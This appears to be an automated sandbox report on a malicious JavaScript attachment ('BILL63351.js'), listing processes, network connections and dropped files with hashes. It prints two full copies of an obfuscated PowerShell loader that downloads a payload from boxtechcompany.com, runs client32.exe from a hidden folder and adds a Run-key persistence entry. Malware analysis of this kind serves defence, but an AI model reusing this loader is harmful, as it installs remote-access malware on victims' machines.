"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $ZCImZQTlpULGp='https://boxtechcompany.com/1/GetData.php?7461';$IZtUzYNNReOunQUmIUqVkfdoVrvHlgee=(New-Object System.Net.WebClient).DownloadString($ZCImZQTlpULGp);$IINLLLBDoklTTt=[System.Convert]::FromBase64String($IZtUzYNNReOunQUmIUqVkfdoVrvHlgee);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $keRzOmOdlHhfQWTzLhoha=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $keRzOmOdlHhfQWTzLhoha -PathType Container)) { New-Item -Path $keRzOmOdlHhfQWTzLhoha -ItemType Directory };$p=Join-Path $keRzOmOdlHhfQWTzLhoha 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$IINLLLBDoklTTt);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$keRzOmOdlHhfQWTzLhoha)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $keRzOmOdlHhfQWTzLhoha 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $keRzOmOdlHhfQWTzLhoha -Force; $FSDFSSD.attributes='Hidden';$s=$keRzOmOdlHhfQWTzLhoha+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:2

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BILL63351.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $PloRsvrHYwhtLNPidec='https://boxtechcompany.com/1/GetData.php?13982';$BZzdVKTFxUSytwkCkWrbBWxxpvhxeUsMGc=(New-Object System.Net.WebClient).DownloadString($PloRsvrHYwhtLNPidec);$eqEzuySWdZoamCI=[System.Convert]::FromBase64String($BZzdVKTFxUSytwkCkWrbBWxxpvhxeUsMGc);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $RLZeZQGsCLTvWqlepOEruhuLtjvdf=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf -PathType Container)) { New-Item -Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf -ItemType Directory };$p=Join-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf 'zxc.zip';[System.IO.File]::WriteAllBytes($p,$eqEzuySWdZoamCI);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RLZeZQGsCLTvWqlepOEruhuLtjvdf)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $RLZeZQGsCLTvWqlepOEruhuLtjvdf 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $RLZeZQGsCLTvWqlepOEruhuLtjvdf -Force; $FSDFSSD.attributes='Hidden';$s=$RLZeZQGsCLTvWqlepOEruhuLtjvdf+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;

C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe

"C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=1488 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6364 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6588 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6472 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6848 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6852 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=7152 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1684 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5916 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6304 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6380 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1760 --field-trial-handle=1756,i,17186741830962327084,7002980369521610796,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 blawx.com udp
RU 188.127.227.29:80 blawx.com tcp
RU 188.127.227.29:80 blawx.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.238:443 apis.google.com tcp
US 8.8.8.8:53 lh5.googleusercontent.com udp
GB 142.250.180.1:443 lh5.googleusercontent.com tcp
GB 142.250.180.1:443 lh5.googleusercontent.com tcp
US 8.8.8.8:53 29.227.127.188.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.180.1:443 lh5.googleusercontent.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 142.250.179.238:443 play.google.com udp
RU 188.127.227.29:443 blawx.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 184.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 197.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 blawx.com udp
RU 188.127.227.29:443 blawx.com tcp
US 8.8.8.8:53 boxtechcompany.com udp
RU 188.127.224.160:443 boxtechcompany.com tcp
US 8.8.8.8:53 160.224.127.188.in-addr.arpa udp
NL 81.19.137.226:443 tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 172.67.68.212:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 226.137.19.81.in-addr.arpa udp
US 8.8.8.8:53 212.68.67.172.in-addr.arpa udp
GB 142.250.187.238:443 apis.google.com udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
RU 188.127.227.29:443 blawx.com tcp
US 8.8.8.8:53 boxtechcompany.com udp
RU 188.127.224.160:443 boxtechcompany.com tcp
RU 188.127.227.29:443 blawx.com tcp
RU 188.127.224.160:443 boxtechcompany.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 3.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 beacons2.gvt2.com udp
SG 172.217.194.94:443 beacons2.gvt2.com tcp
SG 172.217.194.94:443 beacons2.gvt2.com tcp
SG 172.217.194.94:443 beacons2.gvt2.com udp
US 8.8.8.8:53 94.194.217.172.in-addr.arpa udp
RU 188.127.227.29:80 blawx.com tcp
GB 142.250.187.238:443 apis.google.com udp
GB 142.250.180.1:443 lh5.googleusercontent.com udp
RU 188.127.227.29:443 blawx.com tcp
RU 188.127.224.160:443 boxtechcompany.com tcp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
RU 188.127.227.29:443 blawx.com tcp
RU 188.127.224.160:443 boxtechcompany.com tcp
GB 142.250.179.238:443 play.google.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 68.204.58.216.in-addr.arpa udp
GB 142.250.187.238:443 apis.google.com udp
US 8.8.8.8:53 virustotal.com udp
US 216.239.34.21:443 virustotal.com tcp
US 216.239.34.21:443 virustotal.com tcp
US 8.8.8.8:53 www.virustotal.com udp
US 8.8.8.8:53 21.34.239.216.in-addr.arpa udp
US 74.125.34.46:443 www.virustotal.com tcp
US 8.8.8.8:53 www.recaptcha.net udp
GB 142.250.200.3:443 www.recaptcha.net tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 46.34.125.74.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 40.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.179.227:443 recaptcha.net tcp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 78.204.58.216.in-addr.arpa udp
GB 142.250.179.227:443 recaptcha.net udp
GB 216.58.204.68:443 www.google.com udp
US 74.125.34.46:443 www.virustotal.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 beacons.gvt2.com udp
GB 216.58.212.227:443 beacons.gvt2.com tcp
GB 216.58.212.227:443 beacons.gvt2.com udp
US 8.8.8.8:53 227.212.58.216.in-addr.arpa udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 e2c43.gcp.gvt2.com udp
NL 35.214.142.18:443 e2c43.gcp.gvt2.com tcp
US 8.8.8.8:53 18.142.214.35.in-addr.arpa udp
GB 216.58.212.227:443 beacons.gvt2.com udp
US 8.8.8.8:53 www.virustotal.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp

Files

\??\pipe\crashpad_1260_ULZWCYPJRYRQITGD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 547beaf63ead9326310ac0cb9a7446a8
SHA1 8be1b5f63ff5d27aab4e552c9c768836f017a970
SHA256 7c87b872b7679a3d10f1bd86f18081d99b386ce4512febe54c7f84635bfca3ce
SHA512 2b84824c52b91cf80c9627f4b7caddfd40aabc482f21d15313460b6cac041737acd5bf8640cdedcc2a7f4fcb7f332d48b23589fcd5e0648fcc229ba025038c7b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\b7579423-7d5b-4e1c-b32d-da0e3e3c70be.tmp

MD5 f8c1c1ffcfbe6f7a250f45dee470af83
SHA1 0d5e6a0b9751cb8ef7e0ac1413e9247282d6fea9
SHA256 9dc418de524935dbdf2bac08a6628f9dd24c5ec0ad21c01b4049dba444e6e3b2
SHA512 d957236f0c9eb7f52b043999695907ddf5c3615faea9f702504addb02bc6c053114523a9b4a0fc9bf4625bc5c8a5d2d3a34901f1195511263aa9395bedb6af8e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 1b2250c753297dd79d2a75fd61756788
SHA1 d0d6ab98c3545b98f16fc912dfe9f0b1884d5726
SHA256 7d2134eb37d01077748bf6a147d84b5cf9cf337aac772fcba1b00706d29e32c0
SHA512 be2767510449cce297fc09365732043f5c111b52fc661fb2fd00025225423fbc0e63fc760ba2d7392712b75ac7d0b890c65a7d1126f477f12c3d188781f9ce86

C:\Users\Admin\Downloads\BILL63351.js

MD5 55a8424c9605e6740e33c7f6f265e18e
SHA1 8be8f6e01c8210441eec37492d0ec1dd0a1cf0ef
SHA256 70c56698865a3a31045402db6e4519df4aa27c8b356a6e16c3ed2bd32ef74f7c
SHA512 1df2aa8d6c5b7ea7772e2940f6bf3eb2f4992ee5c8fe3d8ee3651312ef6384a3f59c8e893e6e5e1e7708cecb029ef731097023ba4be5ad9c91e5e04e3a4a4881

memory/4420-132-0x00007FFC830B0000-0x00007FFC83A9C000-memory.dmp

memory/4420-133-0x00000261DB650000-0x00000261DB672000-memory.dmp

memory/4420-134-0x00000261DB730000-0x00000261DB740000-memory.dmp

memory/4420-135-0x00000261DB730000-0x00000261DB740000-memory.dmp

memory/4420-138-0x00000261DB840000-0x00000261DB8B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i4w03yg4.ip3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4420-153-0x00000261DB730000-0x00000261DB740000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 806e07e088867c60cdbb89582f71d806
SHA1 59371b98d0ab9a41b365a596bbffbe0a34645fdb
SHA256 7e91a5b7ed5f20ef06886f0f8c76a1a974d4477b8d8768f35b39ede05215e7ea
SHA512 4412c700dd93f5558945f921402f79a41a5599ce235875822bb01d8cf5f5a2b712aaa3b4e2bf6dfe633d27aaf0ecaa13c036db12591de9fd04c7945bb59ba6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0ec503af8195e2649d252877624684e6
SHA1 5acdb69ca4e31d8d8f60a0ef8868d7cd008504e8
SHA256 f09a2d6c87885efe18ae53c52e19c111537d483262c68dce254250101fdf3570
SHA512 cab05d34351fc84b558027eac47486f1d38b90f72f5b7d81f4a1114061ae8a2ac865110b36103690f9a48c03d54841b06159379bdeda73da49dde0f0cbf36b5d

memory/4420-189-0x00000261DB6F0000-0x00000261DB6FA000-memory.dmp

memory/4420-190-0x00000261DB9C0000-0x00000261DB9D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe

MD5 c4f1b50e3111d29774f7525039ff7086
SHA1 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

C:\Users\Admin\AppData\Roaming\DIVX911\PCICL32.dll

MD5 83373fe3096a4f8ef973ba189eba914a
SHA1 b00b0a2e94f9dc5270ed8ba9ae2db36cfbe15992
SHA256 bbdff5bc76d68730b4d9d9e2015ca149189cb2484067271be81acff40975b2f2
SHA512 02d4096933432984ee29df353e139d72dbc69e4dc64731a8cbc06d100550f49793ad9392029df83e164712b9d3105479c56a4a98274e92272a32537e0baf2b06

C:\Users\Admin\AppData\Roaming\DIVX911\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\Roaming\DIVX911\MSVCR100.dll

MD5 ff6694101775f777962422e97ebced2d
SHA1 6e418a9c248620f2449a62d11a6511fae02c6659
SHA256 29e44dcbc682943eff80e99c1144177a02e4c5e62ab3f58bf0aa519e5da30048
SHA512 00d9e099cfc40b92b0934b81b15ca18a0f9c8cde2a02067442fa785c6f32a3ccbeef84ec1dc9b7a6a30aa90501adb42cc973bd51587e387bd9019569200dc65e

\Users\Admin\AppData\Roaming\DIVX911\msvcr100.dll

MD5 7b08bbcd3175294954a12c84ec3ac71e
SHA1 7c68bc2c658e655ae249f3c8f84299b3ff561b39
SHA256 322588b9b2ba33653652b239f9ae79581cd9963a7f97281463ef9aa786242726
SHA512 aa9196c4ccc79cb9ca28db00b7627041e4b1b0f732c8b3483187d4116b7d3a52164e28462332d891bfcee309e6f4182c2abe7b4e49cfa48b3701d30b7cebef15

\Users\Admin\AppData\Roaming\DIVX911\msvcr100.dll

MD5 386d863777748ba378aab6a458e80c80
SHA1 55b314039e7a23a65379b185683bb97adb11cc1c
SHA256 8dc19181afca2de010fa1868908f2c6b57601d9a6cb2a87b5ac14272a6c99a6a
SHA512 18f5916e80cac5e25ff67d21e6bac7ae017fbbc07e0a798ecd1f99eb3aa02d38ac0cb2463b7edff18af2964b22107a2e4ee35560e07c160b4f8277c0e1c568eb

\Users\Admin\AppData\Roaming\DIVX911\PCICHEK.DLL

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

\Users\Admin\AppData\Roaming\DIVX911\PCICL32.DLL

MD5 06172470b8d2c5ff80c0edf79ddd1a8d
SHA1 e9582cea9e2c5d458eba8e13839fba8a9fb04c83
SHA256 704dde3e33fa644b783b88c6ff39f0a4ae0cf682b4fefda481a2c10dd7018240
SHA512 d4f98f3ce21b307eedb5175925f8da8f125fc5d030d9e04f349fa72677b6dcfe719933c80b27ff09dbe84889e6b262c1ecd83219f9f7fca6467310ab111783f4

C:\Users\Admin\AppData\Roaming\DIVX911\client32.ini

MD5 5d5a682d300dd44ec669829d77790b31
SHA1 9a124709f1a17f18b61179bfed6797df13e387a2
SHA256 22f3be353ce99ddc16179f0280936fd2626b949efc3dacf0d23c085a98503ec8
SHA512 beff890c9e59d2033a15eda015db137da44ca77a7361f8b1a1ea76a6138806c898f9eac8a7a794ca0dc32e1f3c5e5bd8058a52164652d015df02305786f407e7

C:\Users\Admin\AppData\Roaming\DIVX911\NSM.LIC

MD5 1b41e64c60ca9dfadeb063cd822ab089
SHA1 abfcd51bb120a7eae5bbd9a99624e4abe0c9139d
SHA256 f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d
SHA512 c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

\Users\Admin\AppData\Roaming\DIVX911\HTCTL32.DLL

MD5 c54a2021124656cbc29132c7a86aa527
SHA1 e1bcacb9f753d914156fdcb84ee40eb74fef3493
SHA256 8317d0e55e6efa2a09e657e13a3e3e0e56358e93aa5435ebc8585adcc1d20c0c
SHA512 db71ac7dcdc60151bec66028fd6f23c0300a6e970be20c7432d92e525c52135e03652f651f146b939718570241052959b23eecdeccee2b53892bacb49b8a37b9

C:\Users\Admin\AppData\Roaming\DIVX911\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

memory/4420-265-0x00007FFC830B0000-0x00007FFC83A9C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

MD5 09e5f289ad49d7ae5e9d81eb822e5a84
SHA1 32155fdc11993875e0a78d5614fc6a94ed446209
SHA256 f787b54dc751a5ffe844f85cdd3cdf2b7af7c8c8cc03f83d289c063ec6c145a9
SHA512 d1396bc37988182e1aa9493aa368de335031924ff6df27aea352ac1519f9d4d56275da0442041d4d95900e4bf1538e84b1920dc8fab8ea822c64d10e024c2988

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

MD5 c7ab521a1a8b1c3649d2cd4f0e4debcc
SHA1 727747ec6061a9b02c796cbc3008fccedb6fbd56
SHA256 9f51c04dfb4746b080a7ce95c55e5197ea16f8fcd7b3afdcca238500b28c15a9
SHA512 e851b84e79590d168ce8744d10227bcad4b31deafd0f3058ebf71aab2d93d8ce781e2248bc117893df0dd5eb3998be3a0e224b640b4198b59a58df1819384307

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

MD5 be2b5c9f5f52af8ffc161d6a3d6cbe8a
SHA1 1c0365805d7e013046001223184af6f1a0e4dd10
SHA256 8530583320290fa3ead55ee907a52cb3c10e2e39aaa779744fbdeb4afe4d6086
SHA512 f3bbb7068cb70597b3c9db7cec85eb775d1f275370593dd3760ad75549b03d90f4faec07a481a561521b1797d0f0e1ec9138dd7915b08fc1c21b1eab7e315c30

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a

MD5 c15d33a9508923be839d315a999ab9c7
SHA1 d17f6e786a1464e13d4ec8e842f4eb121b103842
SHA256 65c99d3b9f1a1b905046e30d00a97f2d4d605e565c32917e7a89a35926e04b98
SHA512 959490e7ae26d4821170482d302e8772dd641ffbbe08cfee47f3aa2d7b1126dccd6dec5f1448ca71a4a8602981966ef8790ae0077429857367a33718b5097d06

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009

MD5 de69cf9e514df447d1b0bb16f49d2457
SHA1 2ac78601179c3a63ba3f3f3081556b12ddcaf655
SHA256 c447dd7677b419db7b21dbdfc6277c7816a913ffda76fd2e52702df538de0e49
SHA512 4aebb7e54d88827d4a02808f04901c0d09b756c518202b056a6c0f664948f5585221d16967f546e064187c6545acef15d59b68d0a7a59897bd899d3e9dda37b1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

MD5 716309aab2bca045f9627f63ad79d0bf
SHA1 38804233a29aaf975d557fe14e762c627bef76e0
SHA256 115f6a626ca115d4ad5581b59275327e0e860b30330a52b0f785561332dd2429
SHA512 adb0bc6cb9b230eda5dac7396a94a9a4dba9c8ba0b2eb73f5f21a20c3ca3d14651420bc6a17e67a71b5bba624f5a4e92d55cbbb898985dcca838184f6dfb2b15

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

MD5 e1b3b5908c9cf23dfb2b9c52b9a023ab
SHA1 fcd4136085f2a03481d9958cc6793a5ed98e714c
SHA256 918b7dc3e2e2d015c16ce08b57bcb64d2253bafc1707658f361e72865498e537
SHA512 b2da7ef768385707afed62ca1f178efc6aa14519762e3f270129b3afee4d3782cb991e6fa66b3b08a2f81ff7caba0b4c34c726d952198b2ac4a784b36eb2a828

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 31c90b650941006596113ed54eb34a1f
SHA1 138d1783ddfb7ab2e830cebf13b866a45598b435
SHA256 b0f4baa1a6c653d8216217131c6996f6db4784d559c3f5f0c897f237035df6bf
SHA512 018168af1ff5a77dd062e13bfdb1d183a6f9b1e967b7fd362c7cfd1402c73aad5e87cba01777a0b635c7125f3f06320b466e161c5e6e51c1f40c3a9b19a353ce

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5817d8.TMP

MD5 e4f64499f2558b0945f24c5362e7c6b9
SHA1 341fbdd120b6be61e7bc711fd300b52e2826b8bf
SHA256 c473fc3511081d64033e12d40a500d45b4763cfb74fcbbaf3b0f0885eb1f5ed2
SHA512 01a7c3e210c9b51816e2146257dd4bc08ea374fce2999d5dfe5c70ac970720679a50952d6920e831523a6e473bc0db98b4641837622b25c81114f884a0da2f5b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

MD5 dcffbaaf426e060aec2ec1b9b51b5c87
SHA1 7ed51b9c9845dc07e6d3b2fbe36713b36183c301
SHA256 d0691984d70cd4b592cb909abb24dd27f123c8b38c79da1c7b3f44871f008a78
